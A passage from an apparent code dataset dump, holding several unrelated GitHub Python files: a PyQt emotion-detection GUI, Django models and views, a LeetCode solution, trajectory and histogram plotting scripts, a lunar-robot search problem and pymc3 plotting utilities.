LegacyAdapter.to_legacy_json(encode_etl_state(state))\n return SingerState(encoded)\n","repo_name":"cognettings/vulscanner","sub_path":"observes/singer/tap-gitlab/tap_gitlab/singer/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"73917988077","text":"import imp\nimport sys\nfrom PyQt5.QtWidgets import *\nimport time\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QThread, pyqtSignal\nfrom pip import main\nfrom tensorflow.keras.models import load_model\n\nimport cv2\nfrom PIL import Image\nfrom keras.preprocessing import image\nimport numpy as np\nfrom skimage import io\n\nmainresult = \"\"\n\nclass App(QMainWindow):\n \n\n def __init__(self):\n super().__init__()\n self.title = 'M-IVT-21 Group3 app'\n self.left = 200\n self.top = 200\n self.width = 350\n self.height = 500\n self.queryimg=None\n self.dir_path=None #\"C:/Users/vovaz/Documents/example/Image-Classifier/images/001_0007.jpg\"\n self.initUI()\n self.setWindowIcon(QtGui.QIcon('icon.png'))\n self.threadpool = QtCore.QThreadPool()\n\n def initUI(self):\n self.central=QWidget()\n self.setCentralWidget(self.central)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.mainbox=QVBoxLayout()\n self.central.setLayout(self.mainbox)\n self.createUI()\n self.show()\n\n\n def createUI(self):\n for i in reversed(range(self.mainbox.count())):\n self.mainbox.itemAt(i).widget().setParent(None)\n\n self.labelmain = QLabel()\n self.labelmain.setAlignment(QtCore.Qt.AlignCenter)\n self.labelmain.setMaximumHeight(50)\n self.labelmain.setText(\"Emotion detector\")\n self.labelmain.setStyleSheet(\"background-color : #62524D;\"\n \"color : white\")\n self.central.setStyleSheet(\"background-color : #9B8888;\")\n font = QtGui.QFont('SansSerif', 20)\n self.labelmain.setFont(font)\n self.mainbox.addWidget(self.labelmain)\n\n self.chooseBtn = QPushButton()\n self.chooseBtn.setText('Выбрать изображение')\n self.chooseBtn.setFixedSize(350,32)\n self.chooseBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.aboutBtn = QPushButton(self)\n self.aboutBtn.setText('О приложении')\n self.aboutBtn.setFixedSize(350, 32)\n self.aboutBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n\n self.groupbox = QGroupBox()\n self.box1 = QHBoxLayout()\n self.groupbox.setFixedHeight(40)\n self.groupbox.setLayout(self.box1)\n self.box1.addWidget(self.aboutBtn)\n self.groupbox.setStyleSheet(\"border : 0px\")\n\n self.groupbox1 = QGroupBox()\n self.box2 = QHBoxLayout()\n self.box2.addWidget(self.chooseBtn)\n self.groupbox1.setLayout(self.box2)\n self.groupbox1.setFixedHeight(40)\n self.groupbox1.setStyleSheet(\"border : 0px\")\n\n self.groupbox2 = QGroupBox()\n self.queryLayout = QHBoxLayout()\n self.groupbox2.setLayout(self.queryLayout)\n self.groupbox2.setStyleSheet(\"background-image : url(icon.png);\"\n \"background-repeat : no-repeat;\"\n \"background-position : center;\"\n \"border : 0px\")\n\n\n self.mainbox.addWidget(self.groupbox2)\n self.mainbox.addWidget(self.groupbox1)\n self.mainbox.addWidget(self.groupbox)\n\n\n self.chooseBtn.clicked.connect(self.openFileNameDialog)\n self.aboutBtn.clicked.connect(self.start)\n\n\n def start(self):\n self.groupbox2.setStyleSheet(\"\")\n self.labelmain.setText(\"О приложении\")\n self.labelabout = QLabel()\n self.labelabout.setAlignment(QtCore.Qt.AlignHCenter)\n self.labelabout.setText(\"Выполнили:\\n\"\n \"Дегтярев А.В.\\n\"\n \"Заморщикова Д.А.\\n\"\n \"Лотов А.Р.\\n\"\n \"Цель проекта:\\n\"\n \"Разработать модель нейронной сети \\n\"\n \"по распознаванию эмоций по \\n\"\n \"фотографиям и разработать к нему\\n\"\n \"графический интерфейс.\\n\"\n \"\\n\"\n \"\\n\"\n \"Основные функциональные особенности\\n\"\n \"и свойства:\\n\"\n \"1) Определение и выделение лица\\n\"\n \"на фотографиях, если на фотографии\\n\"\n \" не только лицо.\\n\" \n \"2) Особенность распознавать 7 видов\\n\"\n \" эмоций человека по выражениям лица:\\n\"\n \"Злость, отвращение, страх, счастье,\\n\"\n \" нейтральный, грусть, удивление.\\n \"\n \"3) Распознавания и выделения эмоций\\n\"\n \"и количественный анализ различных эмоций\\n\"\n \"(добавить цвета выделения и вывод количества).\")\n font = QtGui.QFont('SansSerif', 10)\n self.labelabout.setFont(font)\n self.queryLayout.addWidget(self.labelabout)\n self.groupbox2.setStyleSheet(\"border : 0px\")\n\n self.chooseBtn.setVisible(False)\n self.aboutBtn.setVisible(False)\n\n self.menuBtn = QPushButton()\n self.menuBtn.setText('В главное меню')\n self.menuBtn.setFixedSize(350, 32)\n self.menuBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.groupbox3 = QGroupBox()\n self.box3 = QHBoxLayout()\n self.groupbox3.setFixedHeight(40)\n self.groupbox3.setLayout(self.box3)\n self.box3.addWidget(self.menuBtn)\n self.groupbox3.setStyleSheet(\"border : 0px\")\n\n self.menuBtn.clicked.connect(self.createUI)\n self.mainbox.addWidget(self.groupbox3)\n\n\n def openFileNameDialog(self): ## USE THIS TO GET PATH OF QUERY IMAGE...\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self,\"Select Image\", \"\",\"Image files (*.jpg *.gif *.png)\")\n self.groupbox2.setStyleSheet(\"\")\n if fileName:\n self.queryimg = fileName\n self.im1 = QtGui.QPixmap(fileName).scaled(400, 300, QtCore.Qt.KeepAspectRatio)\n self.label1 = QLabel()\n self.label1.setAlignment(QtCore.Qt.AlignCenter)\n self.label1.setPixmap(self.im1)\n if self.queryLayout.count()==0:\n self.queryLayout.addWidget(self.label1)\n else:\n self.queryLayout.itemAt(0).widget().setParent(None)\n self.queryLayout.addWidget(self.label1)\n\n self.groupbox2.setStyleSheet(\"border : 0px\")\n self.chooseBtn.setVisible(False)\n self.aboutBtn.setVisible(False)\n self.resultBtn = QPushButton()\n self.resultBtn.setText('Результат')\n self.resultBtn.setFixedSize(350, 32)\n self.resultBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.groupbox4 = QGroupBox()\n self.box4 = QHBoxLayout()\n self.groupbox4.setFixedHeight(40)\n self.groupbox4.setLayout(self.box4)\n self.box4.addWidget(self.resultBtn)\n self.groupbox4.setStyleSheet(\"border : 0px\")\n self.resultBtn.clicked.connect(self.result)\n self.mainbox.addWidget(self.groupbox4)\n\n self.menuBtn = QPushButton()\n self.menuBtn.setText('В главное меню')\n self.menuBtn.setFixedSize(350, 32)\n self.menuBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.groupbox5 = QGroupBox()\n self.box5 = QHBoxLayout()\n self.groupbox5.setFixedHeight(40)\n self.groupbox5.setLayout(self.box5)\n self.box5.addWidget(self.menuBtn)\n self.groupbox5.setStyleSheet(\"border : 0px\")\n self.mainbox.addWidget(self.groupbox5)\n self.menuBtn.clicked.connect(self.createUI)\n\n def result(self):\n self.pbar = QProgressBar(self)\n self.pbar.setValue(0)\n self.mainbox.addWidget(self.pbar)\n\n self.thread = Thread()\n self.thread._signal.connect(self.signal_accept)\n self.thread.start()\n\n #код вставить тут\n #путь к изображению хранится в path_to_image = self.queryimg\n #результат сохранить в переменной result в def signal_accept\n #load_model\n model = load_model('model')\n \n path_to_image = self.queryimg\n \n \n # Добаление данных\n prototxt_path = \"./SSD/deploy.prototxt.txt\"\n model_path = \"./SSD/res10_300x300_ssd_iter_140000_fp16.caffemodel\"\n\n # загрузим модель Caffe\n modelssd = cv2.dnn.readNetFromCaffe(prototxt_path, model_path)\n\n # читаем изображение\n img = io.imread(path_to_image)\n # получаем ширину и высоту изображения\n h, w = img.shape[:2]\n\n # предварительная обработка: изменение размера и вычитание среднего\n blob = cv2.dnn.blobFromImage(img, 1.0, (300, 300), (104.0, 177.0, 123.0))\n\n # устанавливаем на вход нейронной сети изображение\n modelssd.setInput(blob)\n # выполняем логический вывод и получаем результат\n output = np.squeeze(modelssd.forward())\n\n print(output.shape[0])\n\n font_scale = 1.0\n for i in range(0, output.shape[0]):\n # получить уверенность\n confidence = output[i, 2]\n # если достоверность выше 50%, то нарисуйте окружающий прямоугольник\n if confidence > 0.5:\n # получить координаты окружающего блока и масштабировать их до исходного изображения\n box = output[i, 3:7] * np.array([w, h, w, h])\n # преобразовать в целые числа\n start_x, start_y, end_x, end_y = box.astype(np.int)\n # рисуем прямоугольник вокруг лица\n cv2.rectangle(img, (start_x, start_y), (end_x, end_y), color=(255, 0, 0), thickness=2)\n # также нарисуем текст\n cv2.putText(img, f\"{confidence*100:.2f}%\", (start_x, start_y-5), cv2.FONT_HERSHEY_SIMPLEX, font_scale, (255, 0, 0), 2)\n\n x = (start_x + end_x) / 2\n y = (start_y + end_y) / 2 \n\n if end_x - start_x < end_y - start_y:\n weith = end_x - start_x\n else: weith = end_y - start_y \n\n weith = weith * 0.5\n\n print(\"----------------------------------------------------------------\")\n print(box)\n\n img = Image.open(path_to_image)\n img_crop = img.crop((x - weith, y - weith, x + weith, y + weith))\n img_crop.save(\"testing.jpg\", quality=100)\n \n img = image.load_img(\"./testing.jpg\",target_size = (48,48),color_mode = \"grayscale\")\n img = np.array(img)\n label_dict = {0:'Злость',1:'Отвращение',2:'Страх',3:'Радость',4:'Нейтральный',5:'Грустный',6:'Удивление'}\n img = np.expand_dims(img,axis = 0) #makes image shape (1,48,48)\n img = img.reshape(1,48,48,1)\n result = model.predict(img)\n result = list(result[0])\n img_index = result.index(max(result))\n global mainresult\n mainresult = label_dict[img_index]\n\n\n def signal_accept(self, msg):\n self.pbar.setValue(int(msg))\n if self.pbar.value() == 99:\n self.pbar.setValue(100)\n result = mainresult # В виде строки\n self.resultBtn.setText(result)\n self.resultBtn.setDisabled(True)\n self.pbar.setVisible(False)\n return\n\nclass Thread(QThread):\n _signal = pyqtSignal(int)\n def __init__(self):\n super(Thread, self).__init__()\n\n def __del__(self):\n self.wait()\n\n def run(self):\n for i in range(100):\n time.sleep(0.01)\n self._signal.emit(i)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())","repo_name":"Aytaldeg/Emotion-detection-M-IVT-21-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13690,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"11609950393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Basket',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('total', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=128)),\n ('slug', models.SlugField(default=b'', unique=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('representative', models.BooleanField(default=False)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Offer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('price', models.DecimalField(default=0, max_digits=7, decimal_places=2)),\n ('views', models.IntegerField(default=0)),\n ('likes', models.IntegerField(default=0)),\n ('description', models.TextField(default=b'', max_length=300)),\n ('category', models.ForeignKey(to='radar.Category')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Transaction',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField(auto_now_add=True)),\n ('customer', models.ForeignKey(to='radar.Customer')),\n ('item', models.ForeignKey(to='radar.Offer')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='basket',\n name='customer',\n field=models.ForeignKey(to='radar.Customer'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='basket',\n name='item',\n field=models.ManyToManyField(to='radar.Offer'),\n preserve_default=True,\n ),\n ]\n","repo_name":"2026929z/Bargain_Radar","sub_path":"bargain_radar_project/radar/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1061422049","text":"class Solution:\n def checkString(self, s: str) -> bool:\n s_dict = {}\n for x in s:\n s_dict[x] = s_dict.get(x, 0) +1\n #check if a exist and s start with a\n if \"a\" in s:\n len_a = s_dict['a']\n if s[:len_a] == ('a' * len_a):\n return True\n # if a not exist and if s not empty\n elif \"a\" not in s and s != '':\n return True \n return False\n ","repo_name":"VidaMaleki/LeetCode","sub_path":"2124-check-if-all-as-appears-before-all-bs/2124-check-if-all-as-appears-before-all-bs.py","file_name":"2124-check-if-all-as-appears-before-all-bs.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31782846811","text":"# This script plots the ground truth trajectories as recorded by the robot arm and the coordinate frames\n# of the as it moves along the trajectory. Do not mess with rotations in this code ever!!!!\n#\n# Author and Maintainer: Tejaswi Digumarti (tejaswi.digumarti@sydney.edu.au)\n\nimport numpy as np\nimport utils\nimport os\n\nimport matplotlib.pyplot as plt\n\n\nif __name__ == \"__main__\":\n sequence = 14\n folder = \"/media/dtejaswi/Seagate Expansion Drive/JoeDanielThesisData/data/sequences/seq\" + str(sequence)\n # make a list of all the pose files in the folder and sort numerically\n pose_files = [f for f in os.listdir(folder) if f.endswith(\".txt\")]\n pose_files = [os.path.join(folder, f) for f in sorted(pose_files)]\n\n # read poses and load into an array\n poses = []\n for i in range(0, len(pose_files)):\n pose_file_name = '{0:06d}.txt'.format(i)\n file_path = open(os.path.join(folder, pose_file_name), 'r')\n p = file_path.readlines()[0]\n p = p.replace('(', '').replace(')', '').replace(']', '').replace('[', '')\n p = np.fromstring(p, sep=',')\n\n poses.append(p)\n poses = np.array(poses).reshape((-1, 6))\n\n # transformation to convert from end effector to camera frame\n transform_e_c = np.eye(4)\n transform_e_c[0, 0] = -1\n transform_e_c[1, 1] = -1\n\n # any other transformation that we wish to apply\n additional_transform = np.eye(4)\n additional_transform[0, 0] = additional_transform[1, 1] = 0\n additional_transform[0, 1] = -1\n additional_transform[1, 0] = 1\n\n poses_w_c = np.zeros((poses.shape[0], 4, 4)) # keep the altered poses as transformation matrices\n for i in range(poses.shape[0]):\n pose_w_e = utils.get_4x4_from_pose(poses[i, :])\n pose_w_c = pose_w_e @ transform_e_c @ additional_transform # this chaining of transformations is correct\n poses_w_c[i, :, :] = pose_w_c\n\n # -------------------\n # plot trajectories\n # -------------------\n fig = plt.figure()\n plt.suptitle(str(sequence))\n ax = fig.add_subplot(111, projection='3d')\n ax.view_init(elev=88, azim=-90)\n\n # plot x, y, z positions\n ax.plot3D(poses[:, 0], poses[:, 1], poses[:, 2], 'k')\n ax.plot3D(poses[0, 0], poses[0, 1], poses[0, 2], 'go')\n ax.plot3D(poses[-1, 0], poses[-1, 1], poses[-1, 2], 'rx')\n\n # ax.plot3D(poses_w_c[:, 0, 3], poses_w_c[:, 1, 3], poses_w_c[:, 2, 3], 'b')\n # ax.plot3D(poses_w_c[0, 0, 3], poses_w_c[0, 1, 3], poses_w_c[0, 2, 3], 'go')\n # ax.plot3D(poses_w_c[-1, 0, 3], poses_w_c[-1, 1, 3], poses_w_c[-1, 2, 3], 'rx')\n\n # draw coordinate axes of the end effector and the camera in the base frame\n for i in range(0, len(poses), 2):\n pose_w_e = utils.get_4x4_from_pose(poses[i, :])\n utils.draw_axes_at(pose_w_e[:], ax, scale=0.01, frame_label=i, arrowstyle='->') # end effector wrt base\n utils.draw_axes_at(poses_w_c[i, :], ax, scale=0.03, frame_label=i, arrowstyle='->') # camera wrt base\n\n ax.set_xlabel(\"X\")\n ax.set_ylabel(\"Y\")\n ax.set_zlabel(\"Z\")\n # ax.set_xlim([-0.8, 0.8])\n ax.set_ylim([0, 0.8])\n ax.set_zlim([0, 0.8])\n plt.show()\n","repo_name":"RoboticImaging/LearnLFOdo_IROS2021","sub_path":"tests/plot_trajectories_and_frames.py","file_name":"plot_trajectories_and_frames.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"34038083701","text":"\"\"\"\nHistogram\n=========\n\nThe :meth:`pygmt.Figure.histogram` method can plot regular histograms.\nUsing the ``series`` parameter allows to set the interval for the width of\neach bar. The type of the histogram (frequency count or percentage) can be\nselected via the ``histtype`` parameter.\n\"\"\"\n\n# %%\nimport numpy as np\nimport pygmt\n\n# Generate random elevation data from a normal distribution\nrng = np.random.default_rng(seed=100)\nmean = 100 # mean of distribution\nstddev = 25 # standard deviation of distribution\ndata = rng.normal(loc=mean, scale=stddev, size=521)\n\n\nfig = pygmt.Figure()\n\nfig.histogram(\n data=data,\n # Define the frame, add a title, and set the background color to\n # \"lightgray\". Add labels to the x-axis and y-axis\n frame=[\"WSne+tHistogram+glightgray\", \"x+lElevation (m)\", \"y+lCounts\"],\n # Generate evenly spaced bins by increments of 5\n series=5,\n # Use \"red3\" as color fill for the bars\n fill=\"red3\",\n # Use the pen parameter to draw the outlines with a width of 1 point\n pen=\"1p\",\n # Choose histogram type 0, i.e., counts [Default]\n histtype=0,\n)\n\nfig.show()\n","repo_name":"GenericMappingTools/pygmt","sub_path":"examples/gallery/histograms/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":676,"dataset":"github-code","pt":"73"} +{"seq_id":"4793888515","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom taggit.models import Tag\n\nfrom account.models import Profile\nfrom .forms import SearchForm\n\n\n# Create your views here.\n\n\ndef users_search(request):\n\n users = User.objects.all().exclude(id=request.user.id)\n reserve_users = []\n\n if request.method == 'POST':\n form = SearchForm(request.POST)\n\n\n if form.is_valid():\n data = form.cleaned_data\n nickname = data['nickname']\n gender = data['gender']\n similar = data['similar']\n similar_tags = list(request.user.profile.tags.names())\n\n if nickname:\n users = User.objects.filter(username=nickname)\n if gender:\n users = User.objects.filter(username__in=list(users), profile__gender=gender)\n if similar:\n users = User.objects.filter(username__in=list(users), profile__tags__name__in=similar_tags)\n\n if len(users) == 0:\n reserve_users = User.objects.all().exclude(id=request.user.id)\n\n context = {\n 'form': form,\n 'users' : users,\n 'reserve_users' : reserve_users\n }\n return render(request, 'search/user_search.html', context=context)\n\n else:\n form = SearchForm()\n\n context = {\n 'users' : users,\n 'form' : form,\n 'reserve_users': reserve_users,\n }\n\n\n\n return render(request, 'search/user_search.html', context=context)","repo_name":"ramses314/Portfolio","sub_path":"network/mysite/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"32680787645","text":"#Robot de exploración luna\n# 0 1 2 3 \n# - B M M\n# - - - -\n# M - - - \n# - M - -\n\nMUESTRAS = ((0,2),(0,3),(2,0),(3,1))\nBATERIA = 1000\nGASTO_IR = 100\nGASTO_DEPOSITAR_MUESTRA = 50\nGASTO_TOMAR_MUESTRA = 250\n\nBASE = (0,1)\nMuestras_Depositadas = []\n# Posición del robot,bateria, muestras\nINITIAL_STATE= (BASE, BATERIA, Muestras_Depositadas)\n\ndef CalcularGastoBateria(posicion):\n posx,posy = posicion\n MovimientosVuelta = abs (BASE[0]-posx) + abs (BASE[1]-posy)\n\n return MovimientosVuelta * GASTO_IR\n\nclass ExploracionLunar(SearchProblem):\n \n def isGoal(self, state):\n posicion_robot, bat, Muestra_Depositadas = state\n return len(MUESTRAS) == len(Muestra_Depositadas)\n\n def actions(self,state):\n posicion_robot, bat, Muestra_Depositadas = state\n fila, columna = posicion_robot\n available_actions = []\n\n if posicion_robot in BASE:\n #Si estoy en la base, debería poder cargarlo.\n available_actions.append('Cargar',posicion_robot)\n\n #Si tengo una muestra pendiente de depositar, debo poder depositarla.\n if len(MUESTRAS) != 0:\n #En este punto con saber que la tarea es depositar sería suficiente.\n available_actions.append('DepositarMuestra',posicion_robot)\n\n if posicion_robot in MUESTRAS:\n #Si estoy en una posición de interes, debo poder tomar la muestra.\n available_actions.append('AgregarMuestra',posicion_robot)\n\n\n if bat > CalcularGastoBateria(posicion_robot):\n #Puedo ir a cualquier lugar mientras se encuentre en el tablero que me permita \n # llegar a la base para cargar según la bateria del momento\n movimientos_posibles = []\n if fila>0:\n movimientos_posibles.append(fila-1,columna)\n if fila <3:\n movimientos_posibles.append(fila+1,columna)\n if columna>0:\n movimientos_posibles.append(fila,columna-1)\n if columna<3:\n movimientos_posibles.append(fila,columna+1)\n\n for mov in movimientos_posibles:\n available_actions.append('Ir',mov)\n\n return available_actions\n\n def results(self, state, action):\n posicion_robot, bat, Muestra_Depositadas = state\n tipo_accion, robot = action\n if tipo_accion == 'Ir':\n posicion_robot = robot\n bat -= GASTO_IR\n if tipo_accion == 'DepositarMuestra':\n Muestra_Depositadas.append(posicion_robot)\n bat -= GASTO_DEPOSITAR_MUESTRA\n if tipo_accion == 'AgregarMuestra':\n bat -= GASTO_TOMAR_MUESTRA\n if tipo_accion == 'Cargar':\n bat = BATERIA\n return (posicion_robot,bat,Muestra_Depositadas)\n\n\n def cost(self,state1,action,state2):\n tipo_accion, robot = action\n costo = 0\n if tipo_accion == 'Ir':\n costo = 5\n if tipo_accion == 'DepositarMuestra':\n costo = 10\n if tipo_accion == 'AgregarMuestra':\n costo = 15\n if tipo_accion == 'Cargar':\n costo = 30\n return costo\n\n def heuristic(self, state):\n posicion_robot, bat, Muestra_Depositadas = state\n costo_heuristic = 0\n #Por cada muestra que falte depositar, \n # como minimo va a tener que ir a cada posición sin contar si la actual esta en una zona de interes.\n \n for muestra in MUESTRAS:\n if muestra not in Muestra_Depositadas and posicion_robot != muestra:\n costo_heuristic += 5\n\n return costo_heuristic \n\n\n\n\n ","repo_name":"Manumusso/Pr-cticaIA","sub_path":"Búsqueda/ExploraciónLunar/#Robot de exploración luna.py","file_name":"#Robot de exploración luna.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23499823092","text":"import pymc3 as pm\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom scipy.stats import mode\nimport pandas as pd\nimport seaborn as sns\nsns.set(font_scale=1)\nsns.set_style(\"whitegrid\", {'axes.grid' : False})\nfrom mednickdb_pysleep.pysleep_utils import pd_to_xarray_datacube\nsns.set_palette(sns.color_palette(\"Set1\", n_colors=8, desat=.5))\nfrom seaborn.relational import scatterplot\n# Bigger than normal fonts\n\n\ndef model_parameters(trace, varnames=None):\n summary_df = pm.summary(trace, varnames=varnames)\n print(summary_df)\n axs = pm.traceplot(trace, varnames=varnames)\n return summary_df, axs\n\n\ndef stage_parameters(trace, stage_param_names, stage_map, label_plot=True):\n stage_map = {v:k for k,v in stage_map.items()}\n _, axs = model_parameters(trace, stage_param_names)\n for param in stage_param_names:\n if trace[param].dtype == np.float64:\n means = extract_mean_as_array(trace, param, 'df')\n print(param, ':\\n', sep='')\n for idx, row in means.iterrows():\n stage_str = [stage_map[row[level]] for level in row.index if level != param]\n print(stage_str, row[param])\n if label_plot:\n axs[0, 0].axvline(row[param], linewidth=0.5, linestyle='--', color='r')\n axs[0,0].text(row[param],\n (axs[0,0].get_ylim()[1] - axs[0,0].get_ylim()[0])/np.random.normal(loc=2, scale=0.5),\n '_'.join(stage_str), rotation=45)\n\n plt.show()\n\n\n\n\ndef extract_mode_as_array(trace, var='z', astype='array'):\n\n def trace_mode(x):\n return pd.Series(mode(x).mode[0], name='mode')\n\n df = pm.summary(trace, stat_funcs=[trace_mode], varnames=[var])\n df = df.reset_index()\n\n def split_fun(x):\n if '__' in x:\n return [int(x) for x in x.split('__')[1].split('_')]\n else:\n return [0]\n\n df['var type'] = df['index'].apply(lambda x: x.split('__')[0])\n df = df.loc[df['var type'] == var, :]\n var_idxs = df['index'].apply(split_fun)\n indexs = np.stack(var_idxs)\n if astype == 'array':\n sizes = indexs.max(axis=0) + 1\n var_array = df['mode'].copy().values.reshape(sizes)\n return var_array\n else:\n df_out = pd.DataFrame(np.concatenate([indexs, np.expand_dims(df['mode'].values, -1)], axis=1))\n df_out.columns = list(df_out.columns[:-1]) + [var]\n return df_out\n\n\ndef extract_mean_as_array(trace, var='z', astype='array'):\n df = pm.summary(trace)\n df = df.reset_index()\n\n def split_fun(x):\n if '__' in x:\n return [int(x) for x in x.split('__')[1].split('_')]\n else:\n return [0]\n\n df['var type'] = df['index'].apply(lambda x: x.split('__')[0])\n df = df.loc[df['var type'] == var, :]\n var_idxs = df['index'].apply(split_fun)\n indexs = np.stack(var_idxs)\n if astype == 'array':\n sizes = indexs.max(axis=0)+1\n var_array = df['mean'].copy().values.reshape(sizes)\n return var_array\n else:\n df_out = pd.DataFrame(np.concatenate([indexs, np.expand_dims(df['mean'].values, -1)], axis=1))\n idx_cols = [str(i) for i in df_out.columns[:-1]]\n df_out.columns = idx_cols+[var]\n if astype == 'xarray':\n return pd_to_xarray_datacube(df_out, idx_cols, value_col=var)\n else:\n return df_out\n\n\ndef gen_data_for_plot(data, x, z=None, rand_sample_vars=[], mean_sample_vars=[], const_vars={}, stages='balanced', nstages=5, samples_per_x_range=500, truncate_to_percentile=0):\n \"\"\"\n Generate some data that we can use to plot poterior/param values for\n :param data: data used to train model, so that levels of x are known\n :param x: continous data for x axis\n :param z: catergorical data for y axis\n :param rand_sample_vars:\n :return:\n \"\"\"\n data_points = data.copy()\n unq_x = data[x].unique()\n if len(unq_x) < 7: #catergorical\n x_data = data[x].sample(samples_per_x_range).values\n else:\n if truncate_to_percentile:\n x_data = np.linspace(np.percentile(data[x],truncate_to_percentile), np.percentile(data[x],100-truncate_to_percentile), samples_per_x_range)\n else:\n x_data = np.linspace(data[x].min(), data[x].max(), samples_per_x_range)\n df = pd.DataFrame({x:x_data})\n for var in mean_sample_vars:\n var_mean = data[var].mean(skipna=True)\n var_std = data[var].std(skipna=True)\n df[var] = var_mean\n data_points = data_points.loc[(var_mean-var_std= 7: # make cont into categorical\n unique_z = np.linspace(data[z].min(), data[z].max(), 7)\n unique_z += (unique_z[1] - unique_z[0])/2\n unique_z = unique_z[:-1]\n\n for z_val in unique_z:\n new_df = df.copy()\n new_df[z] = z_val\n data_cont.append(new_df)\n df = pd.concat(data_cont, axis=0)\n\n return df, data_points\n\n\n\ndef pairplot_divergence(trace, ax=None, divergence=True, color='C3', divergence_color='C2'):\n theta = trace.get_values(varname='theta', combine=True)[:, 0]\n logtau = trace.get_values(varname='tau_log__', combine=True)\n if not ax:\n _, ax = plt.subplots(1, 1, figsize=(10, 5))\n ax.plot(theta, logtau, 'o', color=color, alpha=.5)\n if divergence:\n divergent = trace['diverging']\n ax.plot(theta[divergent], logtau[divergent], 'o', color=divergence_color)\n ax.set_xlabel('theta[0]')\n ax.set_ylabel('log(tau)')\n ax.set_title('scatter plot between log(tau) and theta[0]');\n return ax\n\n\ndef plot_vars(mod, data, x, y, facet_row=None, facet_col=None, hue=None, style=None, y_levels=None, y_level_name='set_y_level_name',\n maps=None, data_points=None, mean_center_means=None, vars_to_label=None,\n num_draws_from_params=100, out_of_sample=True, combine_trace=False, legend='full', points_alpha=0.01):\n for var_name in mod.input_vars:\n if 'consider' in var_name:\n mod.input_vars[var_name].set_value(data[var_name].iloc[0])\n else:\n mod.input_vars[var_name].set_value(data[var_name])\n\n\n vars_ppc = [v for v in [x, y, hue, facet_col, facet_row, style] if v is not None and v != y_level_name]\n\n pps = mod.sample_posterior_predictive(vars=vars_ppc, num_draws_from_params=num_draws_from_params, out_of_sample=out_of_sample)\n\n df_ppc_cont = []\n for var in vars_ppc:\n label = [var] if (y_levels is None) or (var!=y) else y_levels\n df_ppc_var_cont = []\n for ppc_idx, ppc_sample in enumerate(pps[var]):\n df_ppc_var = pd.DataFrame(ppc_sample, columns=label)\n df_ppc_var['ppc_idx'] = ppc_idx\n df_ppc_var_cont.append(df_ppc_var)\n df_ppc = pd.concat(df_ppc_var_cont, axis=0)\n if var != vars_ppc[-1]:\n df_ppc = df_ppc.drop('ppc_idx', axis=1)\n df_ppc_cont.append(df_ppc)\n df = pd.concat(df_ppc_cont, axis=1)\n\n if maps:\n for col in df.columns:\n if col in maps:\n df[col] = df[col].map({v:k for k,v in maps[col].items()})\n\n if y_levels is not None:\n vars_ppc.remove(y)\n df = df.melt(id_vars=['ppc_idx']+vars_ppc, value_vars=y_levels, var_name=y_level_name, 